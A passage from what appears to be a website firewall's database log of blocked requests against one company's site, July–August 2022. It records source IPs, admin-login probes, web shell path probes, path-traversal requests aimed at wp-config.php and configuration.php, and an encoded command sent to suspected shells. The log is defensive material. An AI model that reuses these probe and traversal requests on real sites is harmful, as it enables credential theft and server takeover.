06:54:23','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7383,'2022-07-19 06:54:24','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7384,'2022-07-19 07:13:15','194.34.132.59','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7385,'2022-07-19 07:29:13','156.146.55.228','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7386,'2022-07-19 08:23:10','20.57.153.211','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7387,'2022-07-19 11:04:55','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7388,'2022-07-19 11:59:28','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7389,'2022-07-19 12:36:29','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css','404shield',''),(7390,'2022-07-19 17:24:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7391,'2022-07-19 17:27:29','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7392,'2022-07-19 17:44:14','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7393,'2022-07-19 18:21:39','5.182.26.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(7394,'2022-07-19 18:26:17','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7395,'2022-07-19 20:31:47','52.253.114.4','https://smithandsmith.co.za/wp-content/index.php','404shield',''),(7396,'2022-07-19 21:00:03','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7397,'2022-07-19 22:21:58','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7398,'2022-07-20 01:41:37','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7399,'2022-07-20 04:52:49','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7400,'2022-07-20 04:52:49','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7401,'2022-07-20 05:06:52','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7402,'2022-07-20 05:55:05','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7403,'2022-07-20 05:58:12','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7404,'2022-07-20 07:08:56','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','404shield',''),(7405,'2022-07-20 07:09:03','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/a57bze8931.php','404shield',''),(7406,'2022-07-20 07:09:12','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7407,'2022-07-20 09:58:28','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7408,'2022-07-20 12:34:23','20.211.95.197','https://smithandsmith.co.za/wp-content/themes/twentyfifteen/404.php','404shield',''),(7409,'2022-07-20 14:22:10','194.26.192.187','http://smithandsmith.co.za/contact/','httpbl',''),(7410,'2022-07-20 14:22:11','194.26.192.187','http://smithandsmith.co.za/','httpbl',''),(7411,'2022-07-20 14:54:49','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7412,'2022-07-20 15:38:08','193.201.9.12','https://smithandsmith.co.za/wp-admin/sistem.php','404shield',''),(7413,'2022-07-20 15:39:26','185.220.102.241','https://smithandsmith.co.za/','httpbl',''),(7414,'2022-07-20 15:39:28','185.220.102.241','https://smithandsmith.co.za/','httpbl',''),(7415,'2022-07-20 16:34:18','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7416,'2022-07-20 16:34:18','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7417,'2022-07-20 16:45:52','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7418,'2022-07-20 17:46:38','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7419,'2022-07-20 19:20:32','118.69.173.205','https://smithandsmith.co.za/wp-login.php','404shield',''),(7420,'2022-07-20 20:02:23','51.142.115.168','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7421,'2022-07-20 21:48:30','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7422,'2022-07-20 23:55:47','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7423,'2022-07-21 02:04:44','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','404shield',''),(7424,'2022-07-21 04:22:51','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7425,'2022-07-21 04:27:02','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7426,'2022-07-21 05:38:25','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7427,'2022-07-21 06:09:53','147.78.47.233','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7428,'2022-07-21 06:10:55','20.90.30.57','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7429,'2022-07-21 06:10:56','20.90.30.57','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7430,'2022-07-21 06:10:57','20.90.30.57','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7431,'2022-07-21 07:29:22','20.216.47.86','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7432,'2022-07-21 08:08:14','46.8.110.225','http://smithandsmith.co.za/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','dfishield',''),(7433,'2022-07-21 08:08:14','46.8.111.213','http://smithandsmith.co.za/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','dfishield',''),(7434,'2022-07-21 08:41:32','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7435,'2022-07-21 09:37:39','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7436,'2022-07-21 09:51:48','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7437,'2022-07-21 16:05:21','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7438,'2022-07-21 16:12:41','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7439,'2022-07-21 17:22:15','64.44.102.65','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(7440,'2022-07-21 17:32:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7441,'2022-07-21 17:39:39','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7442,'2022-07-21 19:31:00','198.12.250.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(7443,'2022-07-21 21:24:27','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7444,'2022-07-21 21:26:47','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7445,'2022-07-22 01:39:17','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7446,'2022-07-22 02:40:23','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7447,'2022-07-22 03:45:16','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7448,'2022-07-22 05:17:06','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7449,'2022-07-22 08:24:19','89.97.242.120','https://smithandsmith.co.za/wp-login.php','404shield',''),(7450,'2022-07-22 09:08:48','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7451,'2022-07-22 09:08:48','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7452,'2022-07-22 11:25:10','167.71.213.128','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(7453,'2022-07-22 11:31:56','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/mm-forms/includes/doajaxfileupload.php','404shield',''),(7454,'2022-07-22 11:49:27','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7455,'2022-07-22 11:57:54','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7456,'2022-07-22 15:28:11','204.12.241.154','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7457,'2022-07-22 15:29:08','204.12.241.154','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7458,'2022-07-22 15:30:15','204.12.241.154','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7459,'2022-07-22 15:36:07','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7460,'2022-07-22 17:10:40','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7461,'2022-07-22 18:29:09','54.39.45.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(7462,'2022-07-22 20:59:29','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7463,'2022-07-22 20:59:29','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7464,'2022-07-22 20:59:35','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7465,'2022-07-22 23:50:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7466,'2022-07-23 03:29:10','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7467,'2022-07-23 06:07:56','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7468,'2022-07-23 08:12:39','109.70.100.27','https://smithandsmith.co.za/contact/','httpbl',''),(7469,'2022-07-23 08:12:44','109.70.100.27','https://smithandsmith.co.za/','httpbl',''),(7470,'2022-07-23 08:12:47','109.70.100.27','https://smithandsmith.co.za/','httpbl',''),(7471,'2022-07-23 08:46:30','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7472,'2022-07-23 09:12:50','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7473,'2022-07-23 09:13:29','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7474,'2022-07-23 10:38:06','20.127.196.24','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7475,'2022-07-23 11:40:46','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7476,'2022-07-23 15:15:31','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7477,'2022-07-23 15:22:52','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7478,'2022-07-23 18:37:19','167.235.78.115','https://smithandsmith.co.za/wp-content/plugins/ninja-forms/readme.txt','404shield',''),(7479,'2022-07-23 20:32:49','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7480,'2022-07-23 23:23:44','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7481,'2022-07-24 00:37:44','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7482,'2022-07-24 00:44:13','193.201.9.12','https://smithandsmith.co.za/wp-content/sistem.php','404shield',''),(7483,'2022-07-24 01:14:16','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7484,'2022-07-24 03:01:33','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7485,'2022-07-24 08:20:49','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7486,'2022-07-24 09:49:08','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7487,'2022-07-24 11:05:35','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7488,'2022-07-24 14:36:14','161.35.15.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(7489,'2022-07-24 14:51:09','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7490,'2022-07-24 18:56:22','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7491,'2022-07-24 20:10:38','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7492,'2022-07-24 20:10:38','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7493,'2022-07-24 20:11:45','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7494,'2022-07-24 22:37:22','20.54.252.45','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7495,'2022-07-24 23:03:28','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7496,'2022-07-25 02:48:13','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7497,'2022-07-25 04:05:35','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/gallery-plugin/upload/php.php','404shield',''),(7498,'2022-07-25 04:07:15','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7499,'2022-07-25 08:03:02','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7500,'2022-07-25 08:03:02','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7501,'2022-07-25 08:03:02','194.34.132.57','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7502,'2022-07-25 09:37:10','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','404shield',''),(7503,'2022-07-25 09:37:21','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/a57bze8931.php','404shield',''),(7504,'2022-07-25 09:37:35','20.26.206.191','https://smithandsmith.co.za//wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(7505,'2022-07-25 13:12:14','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7506,'2022-07-25 14:35:50','51.89.138.51','https://smithandsmith.co.za/contact','httpbl',''),(7507,'2022-07-25 14:35:52','51.89.138.51','https://smithandsmith.co.za/','httpbl',''),(7508,'2022-07-25 17:46:46','94.16.116.81','https://smithandsmith.co.za/contact','httpbl',''),(7509,'2022-07-25 17:46:48','94.16.116.81','https://smithandsmith.co.za/','httpbl',''),(7510,'2022-07-25 17:49:49','5.228.32.101','http://smithandsmith.co.za/contact/','httpbl',''),(7511,'2022-07-25 17:49:50','5.228.32.101','http://smithandsmith.co.za/','httpbl',''),(7512,'2022-07-25 17:49:50','5.228.32.101','http://smithandsmith.co.za/','httpbl',''),(7513,'2022-07-25 18:07:31','196.44.176.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(7514,'2022-07-25 21:42:35','171.22.30.115','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','404shield',''),(7515,'2022-07-25 21:42:36','171.22.30.115','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(7516,'2022-07-25 21:42:37','171.22.30.115','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php','404shield',''),(7517,'2022-07-25 22:13:06','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7518,'2022-07-26 01:49:28','194.38.20.161','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(7519,'2022-07-26 09:18:44','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css','404shield',''),(7520,'2022-07-26 09:34:10','20.25.157.59','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7521,'2022-07-26 09:34:11','20.25.157.59','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7522,'2022-07-26 09:34:11','20.25.157.59','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7523,'2022-07-26 11:18:22','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7524,'2022-07-26 20:18:03','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7525,'2022-07-26 21:25:10','67.23.254.254','https://smithandsmith.co.za/wp-login.php','404shield',''),(7526,'2022-07-27 01:20:48','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-presentation/vp/translation.php','404shield',''),(7527,'2022-07-27 01:39:45','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7528,'2022-07-27 05:24:09','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7529,'2022-07-27 09:49:42','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php','404shield',''),(7530,'2022-07-27 14:30:21','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7531,'2022-07-27 14:45:45','144.91.90.252','https://smithandsmith.co.za/wp-login.php','404shield',''),(7532,'2022-07-27 19:38:47','93.105.85.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(7533,'2022-07-27 23:33:44','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7534,'2022-07-28 01:04:32','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/uploader/uploadify/uploadify.css','404shield',''),(7535,'2022-07-28 07:37:35','20.54.252.45','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7536,'2022-07-28 08:23:58','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7537,'2022-07-28 12:01:13','40.66.45.48','https://smithandsmith.co.za/wp-admin.php','404shield',''),(7538,'2022-07-28 12:13:18','40.66.45.48','https://smithandsmith.co.za/wp-admin/includes/class-wp-media-list-data.php','404shield',''),(7539,'2022-07-28 12:13:48','40.66.45.48','https://smithandsmith.co.za/wp-admin/alfacgiapi/perl.alfa','404shield',''),(7540,'2022-07-28 12:13:55','40.66.45.48','https://smithandsmith.co.za/wp-content/alfacgiapi/perl.alfa','404shield',''),(7541,'2022-07-28 13:59:31','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/ajaxupload.js','404shield',''),(7542,'2022-07-28 16:45:49','192.81.214.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(7543,'2022-07-28 17:27:36','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7544,'2022-07-28 20:13:26','172.107.241.110','http://smithandsmith.co.za/contact/','httpbl',''),(7545,'2022-07-28 20:13:28','172.107.241.110','http://smithandsmith.co.za/','httpbl',''),(7546,'2022-07-29 01:02:53','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php','404shield',''),(7547,'2022-07-29 02:02:17','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7548,'2022-07-29 02:31:57','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7549,'2022-07-29 05:09:34','147.78.47.233','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7550,'2022-07-29 11:33:23','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7551,'2022-07-29 18:41:02','199.249.230.143','http://smithandsmith.co.za/contact/','httpbl',''),(7552,'2022-07-29 18:41:10','95.214.54.101','https://smithandsmith.co.za/contact','httpbl',''),(7553,'2022-07-29 18:41:13','95.214.54.101','https://smithandsmith.co.za/','httpbl',''),(7554,'2022-07-29 19:29:52','123.56.59.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(7555,'2022-07-29 20:31:22','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7556,'2022-07-30 01:45:24','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/pica-photo-gallery/css/style.css','404shield',''),(7557,'2022-07-30 05:36:21','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7558,'2022-07-30 12:30:03','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js','404shield',''),(7559,'2022-07-30 14:37:07','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7560,'2022-07-30 16:41:45','20.244.40.246','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(7561,'2022-07-30 20:39:20','67.205.143.236','https://smithandsmith.co.za/wp-login.php','404shield',''),(7562,'2022-07-30 23:40:47','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7563,'2022-07-31 00:39:05','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php','404shield',''),(7564,'2022-07-31 04:57:12','51.142.181.246','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(7565,'2022-07-31 08:40:21','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7566,'2022-07-31 13:05:13','185.100.85.22','http://smithandsmith.co.za/contact/','httpbl',''),(7567,'2022-07-31 13:05:16','185.125.168.210','http://smithandsmith.co.za/','httpbl',''),(7568,'2022-07-31 16:07:24','194.163.132.194','https://smithandsmith.co.za/wp-login.php','404shield',''),(7569,'2022-07-31 17:43:54','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7570,'2022-07-31 22:12:41','78.47.222.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(7571,'2022-07-31 22:12:41','78.47.222.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(7572,'2022-08-01 01:04:15','135.181.248.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(7573,'2022-08-01 02:41:01','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7574,'2022-08-01 06:34:18','194.26.192.187','http://smithandsmith.co.za/contact/','httpbl',''),(7575,'2022-08-01 06:34:19','194.26.192.187','http://smithandsmith.co.za/','httpbl',''),(7576,'2022-08-01 06:34:20','185.220.100.254','http://smithandsmith.co.za/contact/','httpbl',''),(7577,'2022-08-01 06:34:21','185.220.100.254','http://smithandsmith.co.za/','httpbl',''),(7578,'2022-08-01 11:48:33','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7579,'2022-08-01 14:11:15','82.142.27.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(7580,'2022-08-01 17:05:38','139.196.152.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(7581,'2022-08-01 20:44:45','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7582,'2022-08-02 00:53:27','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(7583,'2022-08-02 02:52:09','107.150.46.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(7584,'2022-08-02 02:52:31','107.150.46.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(7585,'2022-08-02 02:54:05','107.150.46.163','https://smithandsmith.co.za/wp-login.php','404shield',''),(7586,'2022-08-02 05:44:26','194.126.177.69','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(7587,'2022-08-02 10:25:44','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/1-flash-gallery/readme.txt','404shield',''),(7588,'2022-08-02 16:55:15','159.203.31.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(7589,'2022-08-02 19:46:02','20.238.126.37','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7590,'2022-08-02 19:46:03','20.238.126.37','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7591,'2022-08-02 19:46:05','20.238.126.37','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7592,'2022-08-02 22:17:17','192.187.111.162','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(7593,'2022-08-02 22:22:23','192.187.111.162','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(7594,'2022-08-02 22:23:09','192.187.111.162','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(7595,'2022-08-02 23:27:35','20.14.97.164','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7596,'2022-08-02 23:28:24','20.14.97.164','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7597,'2022-08-02 23:35:19','102.65.65.55','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7598,'2022-08-02 23:48:34','40.89.128.138','http://www.smithandsmith.co.za/','muashield',''),(7599,'2022-08-02 23:48:35','40.89.128.138','http://www.smithandsmith.co.za/','muashield',''),(7600,'2022-08-02 23:48:52','40.89.128.138','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(7601,'2022-08-03 00:52:15','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php?file=tf2rghf.jpg','404shield',''),(7602,'2022-08-03 02:31:52','41.250.80.18','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(7603,'2022-08-03 02:32:25','41.250.80.18','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(7604,'2022-08-03 02:32:51','41.250.80.18','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(7605,'2022-08-03 12:01:01','20.83.180.254','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7606,'2022-08-03 12:01:01','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7607,'2022-08-03 12:01:01','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7608,'2022-08-03 12:55:40','194.38.20.161','https://smithandsmith.co.za/wp-content/plugins/wp-mailinglist/css/colorbox.css','404shield',''),(7609,'2022-08-03 13:29:11','20.83.180.254','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7610,'2022-08-03 13:29:12','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7611,'2022-08-03 13:29:12','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7612,'2022-08-03 14:12:35','212.154.57.232','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','404shield',''),(7613,'2022-08-03 14:16:46','212.154.57.232','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/bmLUxZLeaiRIek7s/umvUsXN4HVg3BzRf.txt','404shield',''),(7614,'2022-08-03 15:03:25','82.165.242.238','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7615,'2022-08-03 15:03:37','82.165.242.238','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(7616,'2022-08-03 15:37:49','166.0.234.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(7617,'2022-08-03 15:45:01','3.83.242.131','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7618,'2022-08-03 15:45:02','3.83.242.131','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7619,'2022-08-03 15:45:04','3.83.242.131','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7620,'2022-08-03 17:22:58','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7621,'2022-08-03 17:22:59','70.37.162.140','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7622,'2022-08-03 17:23:00','70.37.162.140','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7623,'2022-08-03 17:52:22','20.38.2.17','https://www.smithandsmith.co.za/wp-admin/leaf.php','404shield',''),(7624,'2022-08-03 17:52:23','20.38.2.17','https://www.smithandsmith.co.za/wp-content/leafmailer2.8.php','404shield',''),(7625,'2022-08-03 17:52:24','20.38.2.17','https://www.smithandsmith.co.za/wp-admin/leafmailer2.8.php','404shield',''),(7626,'2022-08-03 17:55:25','35.238.100.219','https://www.smithandsmith.co.za/wp-admin/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7627,'2022-08-03 17:55:26','35.238.100.219','https://www.smithandsmith.co.za/wp-content/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php%20=%20%3E%3E%20shell%20no%20work','404shield',''),(7628,'2022-08-03 17:55:30','35.238.100.219','https://www.smithandsmith.co.za/wp-content/fw.php','404shield',''),(7629,'2022-08-03 19:20:09','20.83.180.254','https://www.smithandsmith.co.za/wp-content/includes/uploads/Va.php','404shield',''),(7630,'2022-08-03 19:20:09','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/readindex.php','404shield',''),(7631,'2022-08-03 19:20:09','20.83.180.254','https://www.smithandsmith.co.za/wp-content/uploads/small.php','404shield',''),(7632,'2022-08-03 21:43:02','167.172.195.213','https://smithandsmith.co.za/wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7633,'2022-08-03 21:43:02','167.172.195.213','https://smithandsmith.co.za/wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7634,'2022-08-03 21:43:03','167.172.195.213','https://smithandsmith.co.za/wp-content/uploads/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=ZWNobyA0MDk3MjMqMjA7','404shield',''),(7635,'2022-08-04 01:25:48','20.127.40.224','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(7636,'2022-08-04 